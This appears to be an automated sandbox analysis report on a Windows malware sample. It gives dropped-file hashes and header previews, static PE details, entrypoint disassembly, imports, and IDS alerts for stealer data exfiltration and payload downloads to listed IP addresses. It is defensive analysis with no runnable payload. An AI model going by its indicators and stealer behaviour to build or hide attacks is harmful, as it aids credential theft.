                                                                                                                                                        Preview: ................................................................................p.......Ne.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................%....... .....f.`(............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.p........m......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Roaming\jutawrs
                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):340480
                                                                                                                                                        Entropy (8bit):6.214047984135777
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:g/+GzERrQfYAaRLiiG7svRiGKj3l6Hy1B//pzEQ:g/+90kLiiIsvEGKjsS1BGQ
                                                                                                                                                        MD5:CA9543DE32176130DD7C0691ABE93D66
                                                                                                                                                        SHA1:07AD8BA7432A6C1A92F63DBA83CA1B64DCA94184
                                                                                                                                                        SHA-256:4F9F2D3789809C1F34877A5CD109AABECCEA14C1CFE423EA271CC7CD0178B23A
                                                                                                                                                        SHA-512:34313EA160641ECA3E60DC8347303CC548C8E55EF9CEDA8D63664BC4BB885D95B4F0F3D1431EE8F076578B4ED08B8207BB18ED1CA2C537AE985A75ECFDE550CD
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@.../.L.Q.../.x.*...I.A.C...@......./.y.v.../.H.A.../.O.A...Rich@...........PE..L....:)_..................... .......@............@..........................P......]...........................................(........b.......................!..p...................................@............................................text...>........................... ..`.data...ho..........................@....gijuril............................@....fisate.............................@....rsrc....b.......d..................@..@.reloc...;.......<..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Roaming\jutawrs:Zone.Identifier
                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):26
                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):9062
                                                                                                                                                        Entropy (8bit):3.162966322247022
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zX+s:j+s+v+b+P+m+0+Q+q+A+s
                                                                                                                                                        MD5:0CF350FDB223C291412B66B4F9C9C72C
                                                                                                                                                        SHA1:DAFED0ABC0A3C433DDA7E9451DEA00A029217F3A
                                                                                                                                                        SHA-256:E73A9F7896C069FB6994AB49DBE5B07F616FFA8ACB594381CC4D321BF39F1730
                                                                                                                                                        SHA-512:3F96AADCA550FE7E0A6964B938693D1454B999BAA27A15959FE093C863280DD8624E9B823AB8F00FDB0C40FC7C4DA8E39CA940FFD15345DC198BE4D38108EADD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                                                                        C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211228_112210_839.etl
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):8192
                                                                                                                                                        Entropy (8bit):3.312041152683271
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:wCgsbcpo+bl5IJ9j/YkHCyII2lG1k8O4j8T2qjFzPNMCwdJRu:jS+r2C226KC4I
                                                                                                                                                        MD5:00B6433CDC9EDFDB5A311A332E5B0FF7
                                                                                                                                                        SHA1:82EEB259FD6C7EF43F594D6854EFA3D2B531F315
                                                                                                                                                        SHA-256:6EBB255F33CB6F71E63EAAC24BED72BC7B924B53922A599E07289CD2246D56CA
                                                                                                                                                        SHA-512:DB92D323ACA925FE6552FDC0DFFE0B6DCBFF4E5765EA8730B52D33D22BCB39B4D96147D47E896D2CCDFB08E4BB159132C659FE2CE505A1B6358F4013144EB294
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: .... ... ....................................... ...!........................... ...x...`........................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... .....9(.(............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.2.2.8._.1.1.2.2.1.0._.8.3.9...e.t.l.........P.P. ...x...`.......................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Windows\SysWOW64\lxijggxd\almerphs.exe (copy)
                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):11435520
                                                                                                                                                        Entropy (8bit):6.522668709904603
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:I0HLeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeen:I
                                                                                                                                                        MD5:C191056C5BF34B8FED02D66198EAD384
                                                                                                                                                        SHA1:C7AC1F255F486B4C26ABB329041A83F6BC918A6F
                                                                                                                                                        SHA-256:B3400209D4B0F773B9DA90FDABAAE320AF863B128AB774ABEBC3A0AD74179D07
                                                                                                                                                        SHA-512:0A7378A2F02922CECE04675B6D4ECD9B7BADA6A4EE651744FA58D3B95822813FECCB2E589CF707266EEEEF2CBD4029DA16B0F191EBA6DEACE2E8F32DD463AB69
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$%,.EK..EK..EK......EK......EK......EK..0..EK..EJ..EK......EK......EK......EK.Rich.EK.........................PE..L.....*_......................B...................@..........................`C.....jF.......................................W..<....pB.............................................................pS..@...............H............................text...p........................... ..`.rdata..............................@..@.data...`.>..`.......T..............@....zupi...r....`B......j..............@..@.rsrc........pB......n..............@..@........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Entropy (8bit):6.214047984135777
                                                                                                                                                        TrID:
                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                        File name:4BfFNMA5mb.exe
                                                                                                                                                        File size:340480
                                                                                                                                                        MD5:ca9543de32176130dd7c0691abe93d66
                                                                                                                                                        SHA1:07ad8ba7432a6c1a92f63dba83ca1b64dca94184
                                                                                                                                                        SHA256:4f9f2d3789809c1f34877a5cd109aabeccea14c1cfe423ea271cc7cd0178b23a
                                                                                                                                                        SHA512:34313ea160641eca3e60dc8347303cc548c8e55ef9ceda8d63664bc4bb885d95b4f0f3d1431ee8f076578b4ed08b8207bb18ed1ca2c537ae985a75ecfde550cd
                                                                                                                                                        SSDEEP:6144:g/+GzERrQfYAaRLiiG7svRiGKj3l6Hy1B//pzEQ:g/+90kLiiIsvEGKjsS1BGQ
                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@.../.L.Q.../.x.*...I.A.C...@......./.y.v.../.H.A.../.O.A...Rich@...........PE..L....:)_..................... .....

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:a2e8e8e8a2a2a488

                                                                                                                                                        Static PE Info

                                                                                                                                                        General

                                                                                                                                                        Entrypoint:0x4240a0
                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                        Digitally signed:false
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                        Time Stamp:0x5F293A97 [Tue Aug 4 10:38:15 2020 UTC]
                                                                                                                                                        TLS Callbacks:
                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                        OS Version Major:5
                                                                                                                                                        OS Version Minor:1
                                                                                                                                                        File Version Major:5
                                                                                                                                                        File Version Minor:1
                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                        Import Hash:39de84e7a601fa8861e0e6a8c8b0a138

                                                                                                                                                        Entrypoint Preview

                                                                                                                                                        Instruction
                                                                                                                                                        mov edi, edi
                                                                                                                                                        push ebp
                                                                                                                                                        mov ebp, esp
                                                                                                                                                        call 00007FD64C36946Bh
                                                                                                                                                        call 00007FD64C360B46h
                                                                                                                                                        pop ebp
                                                                                                                                                        ret
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        mov edi, edi
                                                                                                                                                        push ebp
                                                                                                                                                        mov ebp, esp
                                                                                                                                                        push FFFFFFFEh
                                                                                                                                                        push 0043E9D0h
                                                                                                                                                        push 004278E0h
                                                                                                                                                        mov eax, dword ptr fs:[00000000h]
                                                                                                                                                        push eax
                                                                                                                                                        add esp, FFFFFF98h
                                                                                                                                                        push ebx
                                                                                                                                                        push esi
                                                                                                                                                        push edi
                                                                                                                                                        mov eax, dword ptr [00448B80h]
                                                                                                                                                        xor dword ptr [ebp-08h], eax
                                                                                                                                                        xor eax, ebp
                                                                                                                                                        push eax
                                                                                                                                                        lea eax, dword ptr [ebp-10h]
                                                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                                                        mov dword ptr [ebp-18h], esp
                                                                                                                                                        mov dword ptr [ebp-70h], 00000000h
                                                                                                                                                        lea eax, dword ptr [ebp-60h]
                                                                                                                                                        push eax
                                                                                                                                                        call dword ptr [00401228h]
                                                                                                                                                        cmp dword ptr [004C7F4Ch], 00000000h
                                                                                                                                                        jne 00007FD64C360B40h
                                                                                                                                                        push 00000000h
                                                                                                                                                        push 00000000h
                                                                                                                                                        push 00000001h
                                                                                                                                                        push 00000000h
                                                                                                                                                        call dword ptr [00401224h]
                                                                                                                                                        call 00007FD64C360CC3h
                                                                                                                                                        mov dword ptr [ebp-6Ch], eax
                                                                                                                                                        call 00007FD64C36527Bh
                                                                                                                                                        test eax, eax
                                                                                                                                                        jne 00007FD64C360B3Ch
                                                                                                                                                        push 0000001Ch
                                                                                                                                                        call 00007FD64C360C80h
                                                                                                                                                        add esp, 04h
                                                                                                                                                        call 00007FD64C366678h
                                                                                                                                                        test eax, eax
                                                                                                                                                        jne 00007FD64C360B3Ch
                                                                                                                                                        push 00000010h
                                                                                                                                                        call 00007FD64C360C6Dh
                                                                                                                                                        add esp, 04h
                                                                                                                                                        push 00000001h
                                                                                                                                                        call 00007FD64C35FDE3h
                                                                                                                                                        add esp, 04h
                                                                                                                                                        call 00007FD64C3685EBh
                                                                                                                                                        mov dword ptr [ebp-04h], 00000000h
                                                                                                                                                        call 00007FD64C369DCFh
                                                                                                                                                        test eax, eax

                                                                                                                                                        Rich Headers

                                                                                                                                                        Programming Language:
                                                                                                                                                        • [LNK] VS2010 build 30319
                                                                                                                                                        • [ASM] VS2010 build 30319
                                                                                                                                                        • [ C ] VS2010 build 30319
                                                                                                                                                        • [C++] VS2010 build 30319
                                                                                                                                                        • [RES] VS2010 build 30319
                                                                                                                                                        • [IMP] VS2008 SP1 build 30729

                                                                                                                                                        Data Directories

                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3eebc0x28.text
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xca0000x6288.rsrc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xd10000x2114.reloc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x13700x1c.text
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa5b80x40.text
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000x2e8.text
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                        Sections

                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                        .text0x10000x3f03e0x3f200False0.56658802599data6.87521198283IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .data0x410000x86f680x8c00False0.0388113839286data0.689456659782IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .gijuril0xc80000x50x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .fisate0xc90000xd930xe00False0.00697544642857data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .rsrc0xca0000x62880x6400False0.481875data5.02335826145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .reloc0xd10000x3bf80x3c00False0.4494140625data4.58304829917IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                        Resources

                                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                                        RT_CURSOR0xcda900x130dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        RT_CURSOR0xcdbd80x130dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        RT_CURSOR0xcdd080xf0dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        RT_CURSOR0xcddf80x10a8dBase III DBT, version number 0, next free block index 40Divehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        RT_CURSOR0xceed00x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"Divehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        RT_ICON0xca5a00x8a8dataSpanishColombia
                                                                                                                                                        RT_ICON0xcae480x6c8dataSpanishColombia
                                                                                                                                                        RT_ICON0xcb5100x568GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                        RT_ICON0xcba780x10a8dataSpanishColombia
                                                                                                                                                        RT_ICON0xccb200x988dataSpanishColombia
                                                                                                                                                        RT_ICON0xcd4a80x468GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                        RT_STRING0xcf7900x72dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        RT_STRING0xcf8080x256dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        RT_STRING0xcfa600x794dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        RT_STRING0xd01f80x90dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        RT_ACCELERATOR0xcd9c80x78dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        RT_ACCELERATOR0xcd9700x58dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        RT_GROUP_CURSOR0xcdbc00x14dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        RT_GROUP_CURSOR0xceea00x30dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        RT_GROUP_CURSOR0xcf7780x14dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        RT_GROUP_ICON0xcd9100x5adataSpanishColombia
                                                                                                                                                        None0xcda500xadataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        None0xcda600xadataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        None0xcda400xadataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        None0xcda700xadataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        None0xcda800xadataDivehi; Dhivehi; MaldivianMaldives

                                                                                                                                                        Imports

                                                                                                                                                        DLLImport
                                                                                                                                                        KERNEL32.dllGetNamedPipeHandleStateW, CreateNamedPipeA, CallNamedPipeW, TerminateThread, GetExitCodeProcess, GetVersionExA, VerifyVersionInfoW, SetConsoleCP, GetConsoleAliasesLengthA, VerLanguageNameA, FindFirstFileExA, VerifyVersionInfoA, FreeEnvironmentStringsA, GetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameA, CopyFileA, TlsGetValue, SetConsoleCursorInfo, TzSpecificLocalTimeToSystemTime, AddAtomA, ReleaseMutex, GetNamedPipeHandleStateA, BuildCommDCBAndTimeoutsA, GetProcAddress, LoadLibraryA, GlobalAlloc, Sleep, TlsSetValue, MoveFileA, GetCommandLineW, InterlockedExchange, DeleteFileW, CreateActCtxA, SetFileAttributesA, GetPrivateProfileIntW, GetProcessHeap, CreateNamedPipeW, ReadConsoleOutputCharacterA, GetStartupInfoA, GetDiskFreeSpaceExW, GetCPInfoExW, GetWindowsDirectoryW, GetSystemWow64DirectoryA, SetLastError, GetProfileStringA, GetCalendarInfoW, FreeUserPhysicalPages, GetTickCount, GetStringTypeA, DebugBreak, FindFirstFileA, lstrcmpA, WriteFile, GetConsoleMode, lstrcatW, SetFirmwareEnvironmentVariableA, DefineDosDeviceW, EndUpdateResourceA, WriteConsoleW, InterlockedIncrement, SetSystemTimeAdjustment, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileStructA, GetPrivateProfileStructW, GetFileAttributesExW, HeapUnlock, CreateIoCompletionPort, PeekConsoleInputA, GetNumberFormatW, GetQueuedCompletionStatus, FindResourceExA, SetLocalTime, TryEnterCriticalSection, CreateSemaphoreA, GetThreadLocale, SetFileShortNameA, lstrcpyA, ReplaceFileA, LockFileEx, MoveFileExA, GetConsoleCP, GetVolumePathNameA, FlushConsoleInputBuffer, SearchPathW, FreeConsole, GetConsoleAliasExesLengthW, WriteConsoleInputW, LocalShrink, SetCommState, GetSystemTimeAdjustment, EnumSystemLocalesW, ProcessIdToSessionId, GetDevicePowerState, DeleteTimerQueueTimer, GetWriteWatch, OpenSemaphoreA, GetConsoleScreenBufferInfo, ClearCommBreak, TlsAlloc, OpenMutexW, GetComputerNameW, HeapValidate, GetLastError, OpenMutexA, WaitForMultipleObjectsEx, SignalObjectAndWait, GetSystemPowerStatus, VirtualLock, SetWaitableTimer, ChangeTimerQueueTimer, GetProcessTimes, FatalAppExitA, lstrcpynA, SetNamedPipeHandleState, FillConsoleOutputCharacterA, GetCompressedFileSizeW, FindNextVolumeMountPointA, GetFullPathNameA, WriteProfileStringA, UnlockFile, GlobalAddAtomW, EnterCriticalSection, SetCurrentDirectoryW, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, IsBadReadPtr, RtlUnwind, RaiseException, GetModuleHandleW, ExitProcess, DeleteFileA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, GetModuleFileNameW, InitializeCriticalSectionAndSpinCount, IsProcessorFeaturePresent, HeapAlloc, GetModuleFileNameA, HeapReAlloc, HeapSize, HeapQueryInformation, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, HeapCreate, GetACP, GetOEMCP, IsValidCodePage, GetCurrentThreadId, TlsFree, GetStdHandle, LoadLibraryW, GetLocaleInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStringTypeW, GetLocaleInfoA, IsValidLocale, EnumSystemLocalesA, GetUserDefaultLCID, OutputDebugStringA, OutputDebugStringW, SetFilePointer, SetStdHandle, CreateFileW, CloseHandle, FlushFileBuffers

                                                                                                                                                        Possible Origin

                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                        Divehi; Dhivehi; MaldivianMaldives
                                                                                                                                                        SpanishColombia

                                                                                                                                                        Network Behavior

                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                        12/28/21-03:23:15.785037ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                                                                                                        12/28/21-03:23:58.552124UDP254DNS SPOOF query response with TTL of 1 min. and no authority53571638.8.8.8192.168.2.3
                                                                                                                                                        12/28/21-03:24:03.132446UDP254DNS SPOOF query response with TTL of 1 min. and no authority53526188.8.8.8192.168.2.3
                                                                                                                                                        12/28/21-03:24:07.701521TCP2034813ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern4987180192.168.2.3116.202.188.27
                                                                                                                                                        12/28/21-03:24:09.325010UDP254DNS SPOOF query response with TTL of 1 min. and no authority53536638.8.8.8192.168.2.3
                                                                                                                                                        12/28/21-03:24:10.272887UDP254DNS SPOOF query response with TTL of 1 min. and no authority53587508.8.8.8192.168.2.3
                                                                                                                                                        12/28/21-03:24:17.163571TCP2022482ET TROJAN JS/Nemucod requesting EXE payload 2016-02-014988480192.168.2.3141.8.192.151
                                                                                                                                                        12/28/21-03:24:17.236918TCP2021954ET TROJAN JS/Nemucod.M.gen downloading EXE payload8049884141.8.192.151192.168.2.3
                                                                                                                                                        12/28/21-03:24:21.619959TCP2022482ET TROJAN JS/Nemucod requesting EXE payload 2016-02-014988480192.168.2.3141.8.192.151
                                                                                                                                                        12/28/21-03:24:21.684104TCP2021954ET TROJAN JS/Nemucod.M.gen downloading EXE payload8049884141.8.192.151192.168.2.3
                                                                                                                                                        12/28/21-03:24:11.480222TCP2034813ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern4987180192.168.2.3116.202.188.27

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Dec 28, 2021 03:22:55.173149109 CET4974580192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:55.236190081 CET80497455.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:55.236313105 CET4974580192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:55.236404896 CET4974580192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:55.239186049 CET4974580192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:55.299480915 CET80497455.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:55.301937103 CET80497455.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:55.349338055 CET80497455.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:55.349447012 CET4974580192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:55.362431049 CET4974580192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:55.425518036 CET80497455.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:55.700516939 CET4974680192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:55.763339043 CET80497465.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:55.763458967 CET4974680192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:55.763552904 CET4974680192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:55.763573885 CET4974680192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:55.826332092 CET80497465.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:55.875713110 CET80497465.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:55.875740051 CET80497465.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:55.875818014 CET4974680192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:55.876271963 CET4974680192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:55.938801050 CET80497465.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.204830885 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.267879009 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.268026114 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.268134117 CET4974780192.168.2.35.188.89.48
